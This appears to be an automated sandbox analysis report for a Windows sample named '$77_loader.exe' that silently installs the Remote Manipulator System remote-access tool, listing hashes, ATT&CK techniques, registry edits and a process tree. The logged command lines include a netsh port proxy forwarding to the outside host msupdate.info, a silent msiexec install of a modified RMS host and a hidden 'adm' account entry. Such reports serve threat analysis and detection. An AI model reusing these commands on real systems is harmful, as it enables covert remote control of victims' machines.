rms | 3826953ded758361f9783d67242e4ba87092d637d72bcf81c649e52665c57de4

Analysis

max time kernel
135s
max time network
141s
platform
windows7_x64
resource
win7-20220414-en
submitted
03-05-2022 11:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

$77_loader.exe
Size

397KB
MD5

aff57ee1a4f3731c2036046910f78fb4
SHA1

ef9627c0cadff85a3dfaab6aef0b7c885f03b186
SHA256

3826953ded758361f9783d67242e4ba87092d637d72bcf81c649e52665c57de4
SHA512

5ae93c6dae61782a7ac2fa2079df7006e0655d73e32fd7df1a5c1d44e47fd7dd2da225ea6f93e9d3dcb09be5f84b5dab2130bb4f2d5b0e05d95e866ebde0163f

Score

10^/10

rms discovery evasion persistence rat trojan

Malware Config

Signatures

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms

Blocklisted process makes network request 3 IoCs

flow	pid	Process
23	1440	msiexec.exe
25	1440	msiexec.exe
27	1440	msiexec.exe

Downloads MZ/PE file

Executes dropped EXE 3 IoCs

pid	Process
1080	RMS.exe
660	installer.exe
2000	rutserv.exe

Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Loads dropped DLL 2 IoCs

pid	Process
1080	RMS.exe
1004	MsiExec.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe

Modifies WinLogon 2 TTPs 3 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	$77_loader.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\adm = "0"	$77_loader.exe

Modifies powershell logging option 1 TTPs
evasion

Modify Registry
T1112

Drops file in Program Files directory 53 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\srvinst_x64.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\RWLN.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\RIPCServer.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\fwproc.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\progress.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\stdnames_vpd.gpd	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\setupdrv.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\EULA.rtf	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rms_s.lng	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rmsui2.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unires_vpd.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rmsui.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\webmmux.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rmspm.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unidrv_rms.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rms.gpd	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\progress.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\install.cmd	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rms.gpd	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\srvinst.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\vp8encoder.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\uninstall.cmd	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Russian.lg	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\uninstall.cmd	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rms.lng	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rmsui2.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\SampleClient.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\setupdrv.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rmsui.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unidrvui_rms.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\vp8decoder.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rms.ini	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\VPDAgent.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rmspm.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rms.lng	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unidrv_rms.hlp	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unires_vpd.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\install.cmd	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rms_s.lng	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\ntprint.inf	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\webmvorbisdecoder.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\stdnames_vpd.gpd	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\English.lg	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\VPDAgent_x64.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unidrv_rms.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\webmvorbisencoder.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rms.ini	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unidrvui_rms.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unidrv_rms.hlp	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\fwproc.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\ntprint.inf	msiexec.exe

Drops file in Windows directory 19 IoCs

description	ioc	Process
File created	C:\Windows\SoftwareDistribution\config.xml	$77_loader.exe
File opened for modification	C:\Windows\SoftwareDistribution\config.xml	$77_loader.exe
File opened for modification	C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\ARPPRODUCTICON.exe	msiexec.exe
File created	C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_stop_27D7873393984316BEA10FB36BB4D2F9.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_start_C00864331B9D4391A8A26292A601EBE2.exe	msiexec.exe
File created	C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_start_C00864331B9D4391A8A26292A601EBE2.exe	msiexec.exe
File created	C:\Windows\Installer\6de8ab.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIEDF2.tmp	msiexec.exe
File created	C:\Windows\Installer\6de8ad.ipi	msiexec.exe
File created	C:\Windows\Installer\6de8af.msi	msiexec.exe
File created	C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\ARPPRODUCTICON.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_config_C8E9A92497A149D695F92E4E3AE550F0.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\6de8ab.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF266.tmp	msiexec.exe
File created	C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\UNINST_Uninstall_R_3B1E3C8B7D0945898DA82CEEED02F0C7.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\UNINST_Uninstall_R_3B1E3C8B7D0945898DA82CEEED02F0C7.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_stop_27D7873393984316BEA10FB36BB4D2F9.exe	msiexec.exe
File created	C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_config_C8E9A92497A149D695F92E4E3AE550F0.exe	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Gathers network information 2 TTPs 6 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

pid	Process
1440	NETSTAT.EXE
1436	NETSTAT.EXE
1896	NETSTAT.EXE
540	NETSTAT.EXE
1004	NETSTAT.EXE
768	NETSTAT.EXE

Modifies registry class 24 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\Net	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\7ZipSfx.000\\"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\Media\1 = "DISK1;1"	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\Clients = 3a0000000000	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\7ZipSfx.000\\"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\509B38EF4554FFD4794F292971C81B17\36341E9D66DFD914D99C6C421757C5F9	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\AuthorizedLUAApp = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\Media	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\PackageCode = "EE22CCA5812A64F4CB23B29D2A4A798E"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\Language = "1049"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\ProductIcon = "C:\\Windows\\Installer\\{D9E14363-FD66-419D-9DC9-C62471755C9F}\\ARPPRODUCTICON.exe"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\InstanceType = "0"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\DeploymentFlags = "3"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\509B38EF4554FFD4794F292971C81B17	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\PackageName = "rms.host6.3ru_mod.msi"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\ProductName = "Remote Manipulator System - Host"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\Media\DiskPrompt = "[1]"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\36341E9D66DFD914D99C6C421757C5F9\RMS	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\Version = "115998720"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\Assignment = "1"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\AdvertiseFlags = "388"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\36341E9D66DFD914D99C6C421757C5F9	msiexec.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
1228	$77_loader.exe
1228	$77_loader.exe
1228	$77_loader.exe
1228	$77_loader.exe
1228	$77_loader.exe
1228	$77_loader.exe
1228	$77_loader.exe
1228	$77_loader.exe
660	installer.exe
660	installer.exe
660	installer.exe
660	installer.exe
660	installer.exe
660	installer.exe
1440	msiexec.exe
1440	msiexec.exe
2000	rutserv.exe
2000	rutserv.exe
2000	rutserv.exe
2000	rutserv.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1228	$77_loader.exe
Token: SeRestorePrivilege	1300	msiexec.exe
Token: SeTakeOwnershipPrivilege	1300	msiexec.exe
Token: SeSecurityPrivilege	1300	msiexec.exe
Token: SeDebugPrivilege	540	NETSTAT.EXE
Token: SeDebugPrivilege	1004	NETSTAT.EXE
Token: SeDebugPrivilege	768	NETSTAT.EXE
Token: SeDebugPrivilege	1440	NETSTAT.EXE
Token: SeDebugPrivilege	1436	NETSTAT.EXE
Token: SeDebugPrivilege	1896	NETSTAT.EXE
Token: SeShutdownPrivilege	1636	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1636	msiexec.exe
Token: SeRestorePrivilege	1440	msiexec.exe
Token: SeTakeOwnershipPrivilege	1440	msiexec.exe
Token: SeSecurityPrivilege	1440	msiexec.exe
Token: SeCreateTokenPrivilege	1636	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1636	msiexec.exe
Token: SeLockMemoryPrivilege	1636	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1636	msiexec.exe
Token: SeMachineAccountPrivilege	1636	msiexec.exe
Token: SeTcbPrivilege	1636	msiexec.exe
Token: SeSecurityPrivilege	1636	msiexec.exe
Token: SeTakeOwnershipPrivilege	1636	msiexec.exe
Token: SeLoadDriverPrivilege	1636	msiexec.exe
Token: SeSystemProfilePrivilege	1636	msiexec.exe
Token: SeSystemtimePrivilege	1636	msiexec.exe
Token: SeProfSingleProcessPrivilege	1636	msiexec.exe
Token: SeIncBasePriorityPrivilege	1636	msiexec.exe
Token: SeCreatePagefilePrivilege	1636	msiexec.exe
Token: SeCreatePermanentPrivilege	1636	msiexec.exe
Token: SeBackupPrivilege	1636	msiexec.exe
Token: SeRestorePrivilege	1636	msiexec.exe
Token: SeShutdownPrivilege	1636	msiexec.exe
Token: SeDebugPrivilege	1636	msiexec.exe
Token: SeAuditPrivilege	1636	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1636	msiexec.exe
Token: SeChangeNotifyPrivilege	1636	msiexec.exe
Token: SeRemoteShutdownPrivilege	1636	msiexec.exe
Token: SeUndockPrivilege	1636	msiexec.exe
Token: SeSyncAgentPrivilege	1636	msiexec.exe
Token: SeEnableDelegationPrivilege	1636	msiexec.exe
Token: SeManageVolumePrivilege	1636	msiexec.exe
Token: SeImpersonatePrivilege	1636	msiexec.exe
Token: SeCreateGlobalPrivilege	1636	msiexec.exe
Token: SeRestorePrivilege	1440	msiexec.exe
Token: SeTakeOwnershipPrivilege	1440	msiexec.exe
Token: SeRestorePrivilege	1440	msiexec.exe
Token: SeTakeOwnershipPrivilege	1440	msiexec.exe
Token: SeRestorePrivilege	1440	msiexec.exe
Token: SeTakeOwnershipPrivilege	1440	msiexec.exe
Token: SeRestorePrivilege	1440	msiexec.exe
Token: SeTakeOwnershipPrivilege	1440	msiexec.exe
Token: SeRestorePrivilege	1440	msiexec.exe
Token: SeTakeOwnershipPrivilege	1440	msiexec.exe
Token: SeRestorePrivilege	1440	msiexec.exe
Token: SeTakeOwnershipPrivilege	1440	msiexec.exe
Token: SeRestorePrivilege	1440	msiexec.exe
Token: SeTakeOwnershipPrivilege	1440	msiexec.exe
Token: SeRestorePrivilege	1440	msiexec.exe
Token: SeTakeOwnershipPrivilege	1440	msiexec.exe
Token: SeRestorePrivilege	1440	msiexec.exe
Token: SeTakeOwnershipPrivilege	1440	msiexec.exe
Token: SeRestorePrivilege	1440	msiexec.exe
Token: SeTakeOwnershipPrivilege	1440	msiexec.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
660	installer.exe
2000	rutserv.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1228 wrote to memory of 1832	1228	$77_loader.exe	29
PID 1228 wrote to memory of 1832	1228	$77_loader.exe	29
PID 1228 wrote to memory of 1832	1228	$77_loader.exe	29
PID 1832 wrote to memory of 1820	1832	csc.exe	30
PID 1832 wrote to memory of 1820	1832	csc.exe	30
PID 1832 wrote to memory of 1820	1832	csc.exe	30
PID 1228 wrote to memory of 1636	1228	$77_loader.exe	32
PID 1228 wrote to memory of 1636	1228	$77_loader.exe	32
PID 1228 wrote to memory of 1636	1228	$77_loader.exe	32
PID 1228 wrote to memory of 456	1228	$77_loader.exe	34
PID 1228 wrote to memory of 456	1228	$77_loader.exe	34
PID 1228 wrote to memory of 456	1228	$77_loader.exe	34
PID 1228 wrote to memory of 540	1228	$77_loader.exe	35
PID 1228 wrote to memory of 540	1228	$77_loader.exe	35
PID 1228 wrote to memory of 540	1228	$77_loader.exe	35
PID 1228 wrote to memory of 1004	1228	$77_loader.exe	36
PID 1228 wrote to memory of 1004	1228	$77_loader.exe	36
PID 1228 wrote to memory of 1004	1228	$77_loader.exe	36
PID 1228 wrote to memory of 768	1228	$77_loader.exe	37
PID 1228 wrote to memory of 768	1228	$77_loader.exe	37
PID 1228 wrote to memory of 768	1228	$77_loader.exe	37
PID 1228 wrote to memory of 1516	1228	$77_loader.exe	38
PID 1228 wrote to memory of 1516	1228	$77_loader.exe	38
PID 1228 wrote to memory of 1516	1228	$77_loader.exe	38
PID 1228 wrote to memory of 1348	1228	$77_loader.exe	39
PID 1228 wrote to memory of 1348	1228	$77_loader.exe	39
PID 1228 wrote to memory of 1348	1228	$77_loader.exe	39
PID 1228 wrote to memory of 1652	1228	$77_loader.exe	40
PID 1228 wrote to memory of 1652	1228	$77_loader.exe	40
PID 1228 wrote to memory of 1652	1228	$77_loader.exe	40
PID 1228 wrote to memory of 108	1228	$77_loader.exe	41
PID 1228 wrote to memory of 108	1228	$77_loader.exe	41
PID 1228 wrote to memory of 108	1228	$77_loader.exe	41
PID 1228 wrote to memory of 1604	1228	$77_loader.exe	42
PID 1228 wrote to memory of 1604	1228	$77_loader.exe	42
PID 1228 wrote to memory of 1604	1228	$77_loader.exe	42
PID 1228 wrote to memory of 1440	1228	$77_loader.exe	43
PID 1228 wrote to memory of 1440	1228	$77_loader.exe	43
PID 1228 wrote to memory of 1440	1228	$77_loader.exe	43
PID 1228 wrote to memory of 1436	1228	$77_loader.exe	44
PID 1228 wrote to memory of 1436	1228	$77_loader.exe	44
PID 1228 wrote to memory of 1436	1228	$77_loader.exe	44
PID 1228 wrote to memory of 1896	1228	$77_loader.exe	45
PID 1228 wrote to memory of 1896	1228	$77_loader.exe	45
PID 1228 wrote to memory of 1896	1228	$77_loader.exe	45
PID 1228 wrote to memory of 1080	1228	$77_loader.exe	47
PID 1228 wrote to memory of 1080	1228	$77_loader.exe	47
PID 1228 wrote to memory of 1080	1228	$77_loader.exe	47
PID 1228 wrote to memory of 1080	1228	$77_loader.exe	47
PID 1080 wrote to memory of 660	1080	RMS.exe	48
PID 1080 wrote to memory of 660	1080	RMS.exe	48
PID 1080 wrote to memory of 660	1080	RMS.exe	48
PID 1080 wrote to memory of 660	1080	RMS.exe	48
PID 1080 wrote to memory of 660	1080	RMS.exe	48
PID 1080 wrote to memory of 660	1080	RMS.exe	48
PID 1080 wrote to memory of 660	1080	RMS.exe	48
PID 660 wrote to memory of 1636	660	installer.exe	49
PID 660 wrote to memory of 1636	660	installer.exe	49
PID 660 wrote to memory of 1636	660	installer.exe	49
PID 660 wrote to memory of 1636	660	installer.exe	49
PID 660 wrote to memory of 1636	660	installer.exe	49
PID 660 wrote to memory of 1636	660	installer.exe	49
PID 660 wrote to memory of 1636	660	installer.exe	49
PID 1440 wrote to memory of 1004	1440	msiexec.exe	51

C:\Users\Admin\AppData\Local\Temp\$77_loader.exe
"C:\Users\Admin\AppData\Local\Temp\$77_loader.exe"
1⤵
- Modifies WinLogon
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1228
- C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
  "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qg2xtijr.cmdline"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1832
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
    C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF98D.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF98C.tmp"
    3⤵
    PID:1820
- C:\Windows\system32\chcp.com
  "C:\Windows\system32\chcp.com" 437
  2⤵
  PID:1636
- C:\Windows\system32\netsh.exe
  "C:\Windows\system32\netsh.exe" interface portproxy show all
  2⤵
  PID:456
- C:\Windows\system32\NETSTAT.EXE
  "C:\Windows\system32\NETSTAT.EXE" -na
  2⤵
  - Gathers network information
  - Suspicious use of AdjustPrivilegeToken
  PID:540
- C:\Windows\system32\NETSTAT.EXE
  "C:\Windows\system32\NETSTAT.EXE" -na
  2⤵
  - Gathers network information
  - Suspicious use of AdjustPrivilegeToken
  PID:1004
- C:\Windows\system32\NETSTAT.EXE
  "C:\Windows\system32\NETSTAT.EXE" -na
  2⤵
  - Gathers network information
  - Suspicious use of AdjustPrivilegeToken
  PID:768
- C:\Windows\system32\netsh.exe
  "C:\Windows\system32\netsh.exe" interface portproxy reset
  2⤵
  PID:1516
- C:\Windows\system32\netsh.exe
  "C:\Windows\system32\netsh.exe" interface portproxy show all
  2⤵
  PID:1348
- C:\Windows\system32\netsh.exe
  "C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=757 connectport=443 connectaddress=msupdate.info
  2⤵
  PID:1652
- C:\Windows\system32\netsh.exe
  "C:\Windows\system32\netsh.exe" interface portproxy show all
  2⤵
  PID:108
- C:\Windows\system32\netsh.exe
  "C:\Windows\system32\netsh.exe" interface portproxy show all
  2⤵
  PID:1604
- C:\Windows\system32\NETSTAT.EXE
  "C:\Windows\system32\NETSTAT.EXE" -na
  2⤵
  - Gathers network information
  - Suspicious use of AdjustPrivilegeToken
  PID:1440
- C:\Windows\system32\NETSTAT.EXE
  "C:\Windows\system32\NETSTAT.EXE" -na
  2⤵
  - Gathers network information
  - Suspicious use of AdjustPrivilegeToken
  PID:1436
- C:\Windows\system32\NETSTAT.EXE
  "C:\Windows\system32\NETSTAT.EXE" -na
  2⤵
  - Gathers network information
  - Suspicious use of AdjustPrivilegeToken
  PID:1896
- C:\Users\Admin\AppData\Local\Temp\RMS.exe
  "C:\Users\Admin\AppData\Local\Temp\RMS.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1080
- - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe
    "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe" /rsetup
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:660
  - - C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rms.host6.3ru_mod.msi" /qn
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1636

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1300

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1440
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 22DF1517ADC071A0F5FCE18138FC5424
  2⤵
  - Loads dropped DLL
  PID:1004
- C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
  "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /silentinstall
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:2000

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Registry Run Keys / Startup Folder

T1060

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe

Filesize
6.0MB

MD5
c9704931d887685d96ce92d637d84045

SHA1
0875a71e9118ded121d92f3f46a3af1ec8380f8b

SHA256
0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826

SHA512
3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260

Download Submit
C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe

Filesize
6.0MB

MD5
c9704931d887685d96ce92d637d84045

SHA1
0875a71e9118ded121d92f3f46a3af1ec8380f8b

SHA256
0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826

SHA512
3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260

Download Submit
